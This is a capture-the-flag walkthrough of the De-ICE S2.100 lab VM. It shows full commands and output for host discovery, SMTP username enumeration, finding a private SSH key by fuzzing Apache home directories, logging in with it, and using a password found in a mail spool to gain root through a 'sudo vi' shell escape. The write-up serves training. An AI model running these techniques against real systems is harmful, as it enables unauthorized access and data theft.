This is how I solved the De-ICE S2.100 challenge. The goal is to obtain salary information for the team of employees.
As usual I ran netdiscover on the subnet range, and straight away something jumped out.
This VM was hosting two Apache services on different IPs.
[email protected]:~/de-ice/2.100# netdiscover -r 192.168.2.0/24 -i eth2 Currently scanning: Finished! | Screen View: Unique Hosts 2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 120 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor ----------------------------------------------------------------------------- 192.168.2.100 08:00:27:f6:e8:1d 01 060 CADMUS COMPUTER SYSTEMS 192.168.2.101 08:00:27:f6:e8:1d 01 060 CADMUS COMPUTER SYSTEMS
I then scanned the two IPs with nmap.
[email protected]:~/de-ice/2.100# nmap -n -sV -A -p- 192.168.2.100; nmap -n -sV -A -p- 192.168.2.101 PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp vsftpd 2.0.4 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: Can't parse PASV response: "EOF" 22/tcp open ssh OpenSSH 4.3 (protocol 1.99) |_ssh-hostkey: ERROR: Script execution failed (use -d to debug) |_sshv1: Server supports SSHv1 25/tcp open smtp Sendmail 8.13.7/8.13.7 | smtp-commands: slax.example.net Hello [192.168.2.200], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP, |_ 2.0.0 This is sendmail version 8.13.7 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info 80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2) |_http-methods: No Allow or Public header in OPTIONS response (status code 200) |_http-title: Site doesn't have a title (text/html). 110/tcp open pop3 Openwall popa3d 143/tcp open imap UW imapd 2004.357 |_imap-capabilities: CAPABILITY SCAN LOGIN-REFERRALS MAILBOX-REFERRALS MULTIAPPEND SORT UNSELECT NAMESPACE STARTTLS LITERAL+ IDLE THREAD=REFERENCES THREAD=ORDEREDSUBJECT OK IMAP4REV1 SASL-IR AUTH=LOGINA0001 completed BINARY 443/tcp closed https PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2) | http-methods: Potentially risky methods: TRACE |_See http://nmap.org/nsedoc/scripts/http-methods.html |_http-title: Site doesn't have a title (text/html).
The Apache service on .100 contained a page containing a long list of users, and as before I took these to form a potential list of users. This list was quite a lot longer than in previous challenges, so the time it would take to bruteforce SSH logins would be longer than I was willing to spend.
I decided to try and validate usernames via the SMTP service. After experimenting with different the methods, I had a valid list of users.
[email protected]:~/de-ice/2.100# smtp-user-enum -M RCPT -f root @ slax.example.net -U users -t 192.168.2.100 192.168.2.100: havisham exists 192.168.2.100: magwitch exists 192.168.2.100: pirrip exists
I continued to enumerate the other services, but nothing popped until I ran
nikto against the Apache service on .101 (I can imagine that send quite a few people crazy).
[email protected]:~/de-ice/2.100# nikto -h 192.168.2.101 -Display 124 + OSVDB-637: /~root/: Allowed to browse root's home directory.
It seemed that the root user’s home directory was accessible through Apache, although it appeared empty.
Wfuzz is a web crawler and fuzzing tool. With my list of valid users, I was able to locate their home directories also, but they also appeared empty. I used
wfuzz to try and find hidden directories that are likely to appear in users’ home directories (
I got a hit for a .ssh directory in pirrip’s directory - within which were
[email protected]:~/de-ice/2.100# wfuzz -c -z file,users --hc 404 http://192.168.2.101/~FUZZ/ 00001: C=200 11 L 46 W 570 Ch " - havisham" 00002: C=200 11 L 46 W 570 Ch " - magwitch" 00003: C=200 11 L 46 W 566 Ch " - pirrip" [email protected]:~/de-ice/2.100# wfuzz -c -zfile,users --hc 404 http://192.168.2.101/~FUZZ/.ssh 00003: C=301 9 L 29 W 329 Ch " - pirrip"
I downloaded the id_rsa key and was able to SSH in, as pirrip.
[email protected]:~/de-ice/2.100# chmod 400 id_rsa [email protected]:~/de-ice/2.100# ssh -i id_rsa pirrip @ 192.168.2.100 Linux 2.6.16. [email protected]:~$
Reviewing the passwd and group files showed that pirrip was part of the wheel group, but I was unable to use sudo as I didn’t know pirrip’s password.
I began looking through the filesystem and eventually came across
/var/spool/mail/pirrip. Within here was an email password reminder for pirrip, I tried this password with sudo and it worked.
[email protected]:~$ more /var/spool/mail/pirrip E-Mail: pirrip @ slax.example.net Password: 0l1v3rTw1st [email protected]:~$ sudo -l User pirrip may run the following commands on this host: (root) /usr/bin/more (root) /usr/bin/tail (root) /usr/bin/vi (root) /usr/bin/cat ALL
I could now obtain a list of sudo rights for pirrip. I could’ve used this to obtain the shadow file, to try and crack the root password. However, an easier route to get a root shell, is through the vi text editor.
[email protected]:~$ sudo vi :!/bin/bash bash-3.1# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
I then found
/root/.save/. Trying to extract this directly on the server resulted in error messages about limited disk space. So I transfered the file to my Kali machine using netcat.
No passwords were required to decompress, granting me access to
[email protected]:~/de-ice/2.100# unzip great_expectations.zip [email protected]:~/de-ice/2.100# tar -xvf great_expectations.tar [email protected]:~/de-ice/2.100# cat Jan08 Philip Pirrip: 734-67-0424 5.5% $74,224 Abel Magwitch: 816-03-0028 4.0% $53,122 Estella Havisham: 762-93-1073 12% $84,325